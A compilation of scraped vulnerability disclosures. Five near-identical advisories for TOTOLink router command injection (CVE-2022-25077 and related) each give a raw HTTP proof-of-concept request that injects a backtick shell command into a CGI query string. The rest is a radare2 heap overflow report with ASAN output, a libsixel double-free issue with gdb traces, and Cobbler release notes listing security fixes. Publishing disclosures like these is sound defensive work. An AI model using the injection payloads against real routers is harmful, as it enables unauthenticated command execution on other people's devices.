TOTOLink A3100R V4.1.2cu.5050_B20200504 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3100R V4.1.2cu.5050\_B20200504 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A3100R V4.1.2cu.5050\_B20200504 ，V5.9c.2280\_B20180512，V5.9c.4577\_B20191021，V5.9c.4050\_B20190425，V5.9c.4281\_B20190816，V4.1.2cu.5050\_B20200504，V5.9c.4050\_B20190425\_transition,V4.1.2cu.5050\_B20200504
*   **Firmware download address:** https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html

**Description****1.Product Information:**

TOTOLink A3100R router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/image-20220212023224337.png)

The latest firmware update to 2020-07-28 (The latest version on the official website)

**2\. Vulnerability details**

TOTOLINK A3100R V4.1.2cu.5050\_B20200504 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/22.png)

as shown in the figure below, there is no web login

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/33.png)

CVE-2022-25077: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink T6 V5.9c.4085_B20190428 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink T6 V5.9c.4085\_B20190428 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as T6 V5.9c.4085\_B20190428
*   \*\*Firmware download address:\*\*https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/190/ids/36.html

**Description****1.Product Information:**

TOTOLink T6 V5.9c.4085\_B20190428 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/image-20220213001350971.png)

**2\. Vulnerability details**

TOTOLink T6 V5.9c.4085\_B20190428 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/33.png)

CVE-2022-25084: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink T10 V5.9c.5061_B20200511 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink T10 V5.9c.5061\_B20200511 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as T10 V5.9c.5061\_B20200511
*   **Firmware download address:** https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/172/ids/36.html

**Description****1.Product Information:**

TOTOLink T10 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/image-20220212234850675.png)

**2\. Vulnerability details**

![Figure 2 Local of file](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/image-20220212235410138.png)

TOTOLink T10 V5.9c.5061\_B20200511 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 3 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/image-20220212235159394.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/22.png)

However response code is 500, the code is still executed successfully

![Figure 5 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/33.png)

CVE-2022-25081: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink A860R V4.1.2cu.5182_B20201027 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A860R V4.1.2cu.5182\_B20201027 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A860R V4.1.2cu.5182\_B20201027
*   **Firmware download address:** http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=62&ids=36

**Description****1.Product Information:**

TOTOLink A860R V4.1.2cu.5182\_B20201027 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A860R/images/image-20220213010230804.png)

The latest version on the official website)

**2\. Vulnerability details**

![image-20220213010452255](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A860R/images/image-20220213010452255.png)

TOTOLINK A860R V4.1.2cu.5182\_B20201027 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A860R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A860R/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A860R/images/33.png)

CVE-2022-25083: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A950RG Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A950RG V5.9c.4050\_B20190424,V4.1.2cu.5204\_B20210112
*   **Firmware download address:** https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/167/ids/36.html

**Description****1.Product Information:**

TOTOLink A950RG router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A950RG/images/image-20220213002602145.png)

**2\. Vulnerability details**

![image-20220213002931237](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A950RG/images/image-20220213002931237.png)

TOTOLINK A950RG was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A950RG/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A950RG/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A950RG/images/33.png)

CVE-2022-25082: IOT_vuln/README.md at main · EPhaha/IOT_vuln

Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.6.4.

**Description**

heap-buffer-overflow /home/ubuntu/fuzz/radare2/libr/include/r\_endian.h:176 in r\_read\_le32

**Environment**

    Distributor ID: Ubuntu
    Description:    Ubuntu 20.04 LTS
    Release:    20.04
    Codename:   focal
    
    radare2 5.6.3 27472 @ linux-x86-64 git.5.6.2
    commit: d24dbb9fbb0b398a6a739847008ccef3ea7e687c 
    

**ASAN**

    =================================================================
    ==3022342==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62400012dd3f at pc 0x7f1a2103bced bp 0x7ffdadb6e090 sp 0x7ffdadb6e080
    READ of size 1 at 0x62400012dd3f thread T0
        #0 0x7f1a2103bcec in r_read_le32 /home/ubuntu/fuzz/radare2/libr/include/r_endian.h:176
        #1 0x7f1a2103bcec in r_read_at_le32 /home/ubuntu/fuzz/radare2/libr/include/r_endian.h:185
        #2 0x7f1a2103bcec in r_read_le64 /home/ubuntu/fuzz/radare2/libr/include/r_endian.h:199
        #3 0x7f1a2103bcec in r_coresym_cache_element_new /home/ubuntu/fuzz/radare2/libr/..//libr/bin/p/../format/mach0/coresymbolication.c:227
        #4 0x7f1a210323ea in parseDragons /home/ubuntu/fuzz/radare2/libr/..//libr/bin/p/bin_symbols.c:250
        #5 0x7f1a210323ea in load_buffer /home/ubuntu/fuzz/radare2/libr/..//libr/bin/p/bin_symbols.c:289
        #6 0x7f1a210323ea in load_buffer /home/ubuntu/fuzz/radare2/libr/..//libr/bin/p/bin_symbols.c:253
        #7 0x7f1a20b08d17 in r_bin_object_new /home/ubuntu/fuzz/radare2/libr/bin/bobj.c:147
        #8 0x7f1a20af9db0 in r_bin_file_new_from_buffer /home/ubuntu/fuzz/radare2/libr/bin/bfile.c:560
        #9 0x7f1a20ab4b67 in r_bin_open_buf /home/ubuntu/fuzz/radare2/libr/bin/bin.c:279
        #10 0x7f1a20ab6009 in r_bin_open_io /home/ubuntu/fuzz/radare2/libr/bin/bin.c:339
        #11 0x7f1a218f82c8 in r_core_file_do_load_for_io_plugin /home/ubuntu/fuzz/radare2/libr/core/cfile.c:435
        #12 0x7f1a218f82c8 in r_core_bin_load /home/ubuntu/fuzz/radare2/libr/core/cfile.c:636
        #13 0x7f1a218f82c8 in r_core_bin_load /home/ubuntu/fuzz/radare2/libr/core/cfile.c:604
        #14 0x7f1a24a062ba in r_main_radare2 /home/ubuntu/fuzz/radare2/libr/main/radare2.c:1179
        #15 0x7f1a247a50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #16 0x560f17c179fd in _start (/home/ubuntu/fuzz/radare2/binr/radare2/radare2+0x99fd)
    
    0x62400012dd3f is located 0 bytes to the right of 7231-byte region [0x62400012c100,0x62400012dd3f)
    allocated by thread T0 here:
        #0 0x560f17d02a48 in __interceptor_malloc (/home/ubuntu/fuzz/radare2/binr/radare2/radare2+0xf4a48)
        #1 0x7f1a210355c1 in r_coresym_cache_element_new /home/ubuntu/fuzz/radare2/libr/..//libr/bin/p/../format/mach0/coresymbolication.c:180
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/fuzz/radare2/libr/include/r_endian.h:176 in r_read_le32
    Shadow bytes around the buggy address:
      0x0c488001db50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c488001db60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c488001db70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c488001db80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c488001db90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c488001dba0: 00 00 00 00 00 00 00[07]fa fa fa fa fa fa fa fa
      0x0c488001dbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c488001dbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c488001dbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c488001dbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c488001dbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3022342==ABORTING
    

**POC**

    ./radare2 -qq -AA ./heap_overflow_poc
    

heap\_overflow\_poc

**Impact**

The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

CVE-2022-0713: Heap-based Buffer Overflow in radare2

In libsixel 1.8.6, sixel_encoder_output_without_macro (called from sixel_encoder_encode_frame in encoder.c) has a double free.

Hi, I found a double free or corruption in the current master 6a5be8b,  
OS: ubuntu 18.04  
kernel: 5.4.0-87-generic

POC: poc.zip

![image](https://user-images.githubusercontent.com/23655229/140643369-d02accea-8d38-484c-b2d1-8788a6ff0dbf.png)

*   gdb

    ───────────────────────────────────────────────────────────────────────── Registers ──────────────────────────────────────────────────────────────────────────
    RAX: 0x0 
    RBX: 0x7ffff7c1ab80 (0x00007ffff7c1ab80)
    RCX: 0x7ffff7c6218b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    RDX: 0x0 
    RSI: 0x7fffffffd570 --> 0x0 
    RDI: 0x2 
    RBP: 0x7fffffffd8c0 --> 0x7ffff7e07b80 --> 0x0 
    RSP: 0x7fffffffd570 --> 0x0 
    RIP: 0x7ffff7c6218b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    R8 : 0x0 
    R9 : 0x7fffffffd570 --> 0x0 
    R10: 0x8 
    R11: 0x246 
    R12: 0x7fffffffd7e0 --> 0x0 
    R13: 0x10 
    R14: 0x7ffff7ffb000 --> 0x62756f6400001000 
    R15: 0x1
    EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    ──────────────────────────────────────────────────────────────────────────── Code ────────────────────────────────────────────────────────────────────────────
       0x7ffff7c6217f <__GI_raise+191>:	mov    edi,0x2
       0x7ffff7c62184 <__GI_raise+196>:	mov    eax,0xe
       0x7ffff7c62189 <__GI_raise+201>:	syscall 
    => 0x7ffff7c6218b <__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108]
       0x7ffff7c62193 <__GI_raise+211>:	xor    rax,QWORD PTR fs:0x28
       0x7ffff7c6219c <__GI_raise+220>:	jne    0x7ffff7c621c4 <__GI_raise+260>
       0x7ffff7c6219e <__GI_raise+222>:	mov    eax,r8d
       0x7ffff7c621a1 <__GI_raise+225>:	add    rsp,0x118
    [rsp+0x108] : 0x7fffffffd678 --> 0x56e8b0c29e2fc000 
    ─────────────────────────────────────────────────────────────────────────── Stack ────────────────────────────────────────────────────────────────────────────
    0000| 0x7fffffffd570 --> 0x0 
    0008| 0x7fffffffd578 --> 0xffffff01 
    0016| 0x7fffffffd580 --> 0x2 
    0024| 0x7fffffffd588 --> 0x48b8e0 --> 0x48b860 --> 0x0 
    0032| 0x7fffffffd590 --> 0x48b8e4 --> 0x48301000000000 
    0040| 0x7fffffffd598 --> 0x1 
    0048| 0x7fffffffd5a0 --> 0x100000002 
    0056| 0x7fffffffd5a8 --> 0x48b930 --> 0x0 
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    Legend: code, data, rodata, heap, value
    Stopped reason: SIGABRT
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7c41859 in __GI_abort () at abort.c:79
    #2  0x00007ffff7cac3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7dd6285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
    #3  0x00007ffff7cb447c in malloc_printerr (str=str@entry=0x7ffff7dd8670 "double free or corruption (out)") at malloc.c:5347
    #4  0x00007ffff7cb6120 in _int_free (av=0x7ffff7e07b80 <main_arena>, p=0x4b3a70, have_lock=<optimized out>) at malloc.c:4314
    #5  0x0000000000407f8a in sixel_encoder_output_without_macro (frame=<optimized out>, dither=0x48b600, output=<optimized out>, encoder=0x4832d0)
        at encoder.c:831
    #6  sixel_encoder_encode_frame (encoder=0x4832d0, frame=<optimized out>, output=<optimized out>) at encoder.c:1056
    #7  0x000000000041c22b in load_with_builtin (pchunk=<optimized out>, fstatic=<optimized out>, fuse_palette=0x1, reqcolors=<optimized out>, 
        bgcolor=<optimized out>, loop_control=<optimized out>, fn_load=<optimized out>, context=<optimized out>) at loader.c:963
    #8  sixel_helper_load_image_file (filename=<optimized out>, fstatic=<optimized out>, fuse_palette=0x1, reqcolors=<optimized out>, bgcolor=<optimized out>, 
        loop_control=<optimized out>, fn_load=<optimized out>, finsecure=<optimized out>, cancel_flag=<optimized out>, context=<optimized out>, 
        allocator=<optimized out>) at loader.c:1418
    #9  0x00000000004066e5 in sixel_encoder_encode (encoder=0x4832d0, filename=0x7fffffffe662 "./out/crashes/id:000003,sig:06,src:001126,op:arg1,rep:2")
        at encoder.c:1743
    #10 0x0000000000402f73 in main (argc=<optimized out>, argv=<optimized out>, argv@entry=0x7fffffffe318) at img2sixel.c:457
    #11 0x00007ffff7c430b3 in __libc_start_main (main=0x4026a0 <main>, argc=0xb, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308
    #12 0x00000000004025de in _start ()
    gdb-peda$

CVE-2021-46700: double free or corruption in encoder.c:831 · Issue #158 · saitoha/libsixel

An issue was discovered in Cobbler through 3.3.0. In the templar.py file, the function check_for_invalid_imports can allow Cheetah code to import Python modules via the "#from MODULE import" substring. (Only lines beginning with #import are blocked.)

This release addresses mainly security issues and bugfixes.

We have 212 files changed, 2665 insertions(+), 125148 deletions(-)

Milestone: https://github.com/cobbler/cobbler/milestone/15

Diff to last release: v3.3.0...v3.3.1

**Announcements**:

*   Important Security Bugfixes
    *   CVE-2021-45082: Incomplete template sanitation #2945
    *   CVE-2021-45083: Make configuration files only readable by root #2945
    *   Stabilize MongoDB serializer #2919
    *   Log file pollution: validate the data before logging it #2911
    *   Authentication: Remove testing module due to hardcoded well known  
        credentials #2908

**New**:

*   Support for Windows 11 #2819
*   Support for FreeBSD 12.2 & 13.0 #2929
*   UEFI support #2416

**Breaking Changes**:

*   `cobbler mkgrub` renamed to `cobbler mkloaders` #2807

**Bugfixes**:

*   `cobbler <item> rename` should work again now #2824
*   ldap\_anonymous\_bind #2831
*   Wrong bind path for Debian #2927
*   RHEL/Fedora arches in signatures #2895
*   Auto migrate settings #2871
*   System: Fix serial\_device and serial\_baud\_rate #2923
*   Cannot set property 'file' of image #2878
*   Enums: Fix failure to convert `<<inherit>>` #2920
*   `cobbler mkloaders` for non-SUSE distros did not work #2851
*   Added `ipv6_prefix` to `post_install_network_config` #2928

**Other**:

*   Internal Refactorings:
    
    *   Add systemctl for systemd based systems #2841
    *   Enums: Create general str to enum converter #2901
    *   Systems: Re-enable the modify\_interface call #2921
    *   Utils: Check if service is running before stopping it #2936
    *   Several check enhancements #2809
    *   Remove old Cobbler Web leftovers #2938
    *   Simplify remote\_boot\_file setters #2886
*   Docs
    
    *   Explain TFTP and internal database #2904
*   Tests:
    
    *   Add tftpgen unit tests #2808
    *   Add system unit tests #2814
    *   Add system test for `cobbler buildiso` #2822
    *   XMLRPC test for adding an interface to a system #2907
*   CI/container:
    
    *   Improvements for the development container #2806
    *   Use prebuilt images for testing #2812
    *   CentOS to Rocky Linux move for Compose #2939
    *   Add python-rpm-macros #2872

This release got everything! Security, Features, Bugfixes, ...

We have 422 files changed, 25375 insertions(+), 34826 deletions(-)

Milestone: https://github.com/cobbler/cobbler/milestone/10

Diff to last release: v3.2.1...v3.3.0

**Known Issues**:

*   `cobbler <item> rename` is not working currently
*   `cobbler <item> edit` may have bugs due to the internal refactorings

**Breaking Changes**:

*   The webinterface got removed #2434 #2434 #2700
    *   Please use the CLI in the meantime
    *   A new webinterface is under development at https://github.com/cobbler/cobbler-web
    *   The core code has priority at any time. There are third party tools available which provide a webinterface and use  
        Cobbler as a backend. A list of those tools can be found at the bottom of the following page: https://cobbler.github.io/users.html
*   The Cobbler internal TFTP Demon got removed #2512
*   `yaboot` support got removed as a bootloader for PowerPC #2723

**Announcements**:

*   Important Security Bugfixes #2794 #2795
    *   Arbitrary Read was possible through `generate_script()`
    *   Arbitrary Write was possible through `upload_log_data()`
    *   Log poisoning with Remote-Code-Execution was possible through any XMLRPC method which logs to the logfile.
*   There was an internal refactoring from runtime created Python attributes to Python Properties. This allows much  
    better data validation and thus better error handling but also introduced new bugs.  
    Related: #2433 #2666 #2677 #2753 #2699 #2692 #2684 #2707 2727 #2726 #2685 #2675 #2678 #2682 #2674 #2676 #2681 #2683 #2696 #2702 #2732 #2733 #2722 #2680 #2711
*   This is the first release with the new avatar #2604

**New**:

*   The `migrate-data-v2-to-v3.py` script is now packages and can directly be used #2591
*   The `mkgrub.sh` script was converted to the command `cobbler mkgrub` #2739 #2721
*   We now have automigrations and validation for the application settings #2747 #2719 #2772 #2769
*   New distros are now able to be imported:
    *   Debian 11 #2758
    *   Fedora 34 #2713
*   `cobbler sync` now supports syncing only specified systems #2601
*   You can now define your own boot menu structure #2575
*   Cobbler is able to run on RockyLinux and import it #2627
*   DHCPv6 is now natively supported #2539 #2511 #2647

**Changes**:

*   Internal cache got fully removed with #2684 (related #2661)
*   `cobbler get-loaders` was removed for security reasons #2572
*   Removed the `simplejson` dependency as it is redundant now #2572
*   Docs: Multiple enhancements #2599 #2788
*   Logger: Changed to the default Python 3 logger (much more configurable) #2573
*   Old bootloaders which were not shipped by default got removed #2641
*   Windows autoinstallation was simplified #2767
*   We are now using `os.urandom` instead of `/dev/urandom` #2752
*   We have reduced the usage of the generic `CX` exception #2643
*   `ipmilanplus` is the default fence agent for power operations #2714
*   For nested GRUB menus we now show an indicator #2693 #2693
*   Items can now be found even if the item type is not specified #2663

**Bugfixes**:

*   Be compliant with CORS pre-flight requests #2594
*   `cobbler reposync`: SSL related problems were fixed #2759
*   Autoinstall templates directory was wrong per default. #2590
*   We do not strip the last two characters anymore when rendering via an HTTP(S) Endpoint #2626
*   `cobbler check` does not complain about the old name of the settingsfile anymore #2630
*   openSUSE Tumbleweed AutoYAST templating was fixed again 2629 #2628 #2632
*   `cobbler hardlink` now works with non default web directories #2774
*   GRUB got a few Cobbler related fixes #2653 #2792 #2743
*   `pxe_just_once` is working as expected now #2783 #2784
*   Anaconda installation process `ONBOOT` is now able to be set with and without qotation marks 2775
*   The Autoinstall Manager crashes correctly in case of an error #2791
*   `cobbler distro delete` now doesn't leave repository configs behind #2729 #1370
*   `cobbler sync --dns` is now working as expected again #2710 #2712

**Other**:

*   Internal Refactorings:
    *   Base class for all manager modules is used now #2610
    *   Cobbler litesync was moved into Cobbler sync #2615
    *   `field_info.py` functionality was removed since it was unused #2662
    *   API is used instead of the collection manager #2652
    *   Settings are now held in the API instead of the collection manager #2664
    *   Directly use the UUID module where available #2650
    *   Don't clone an object during rename #2744
    *   `kopts_overwrite` is more error resistent now #2651
*   Docs:
    *   Added missing dependency for building #2571
    *   Fix build errors #2633
    *   Extend `__init__.py` files with content about Python modules #2642
    *   Spelling #2731
    *   Types for many external API methods #2785
    *   Document properties #2773
    *   General cleanup #2771
*   Tests: Multiple new testcases to improve stability and coverage #2656 #2740 #2745 #1492 #2645 #2649
*   GitHub Issue templates were revamped #2578
*   Packaging: Specfile got a few improvements #2780
*   CI:
    *   Obsolete testing container #2730
    *   Also use the openSUSE Build Service for packaging on PRs #2672
    *   Package also for openSUSE #2607
    *   Enhance the Setup scrips #2331
*   Development: Container now exposes 80 & 443 2609

This is a security only release.

> The Django webinterface is removed with V3.3.0 but is included in V3.2.2!

We have

Milestone: https://github.com/cobbler/cobbler/milestone/17

Diff to last release: v3.2.1...v3.2.2

**Breaking Changes**: None

**Announcements**:

*   Important Security Bugfixes #2797
    *   Arbitrary Read was possible through `generate_script()`
    *   Arbitrary Write was possible through `upload_log_data()`
    *   Log poisoning with Remote-Code-Execution was possible through any XMLRPC method which logs to the logfile.

**New**:

*   AlmaLinux & RockyLinux are now supported #2705

**Changes**: None

**Bugfixes**: None

**Other**:

*   Release preparations #2798

This release is a lot about bug fixes and smaller improvements.

Important: This will be the very last release to contain the already deprecated Django Web Interface.

We have 184 changed files, 8391 insertions and 3362 deletions. We have merged 45 pull requests.

Milestone: https://github.com/cobbler/cobbler/milestone/9

Diff to last release: v3.2.0...v3.2.1

**New**:

*   Signatures: Add ESXi 7.0 U1 #2525 #2526 #2442
*   Signatures: Add AlmaLinux to supported distros #2536
*   Signatures: Add generic openSUSE Leap 15 #2508
*   Settings: Use `.yaml` as a file extension #2531
*   Settings: Validate what settings we have in the YAML-File #2533 #2419 #2530
*   Modules: We now support automatic Windows installations #2466
*   Docs: Terraform provider now included #2166 #2528

**Changes**:

*   Web Frontend: Show VMware as a breed #2449
*   Logging check fails with SELinux #2440 #2441
*   Typing: Convert docstring types to typing types #2564
*   ESXi Support: Now partly supported #2541
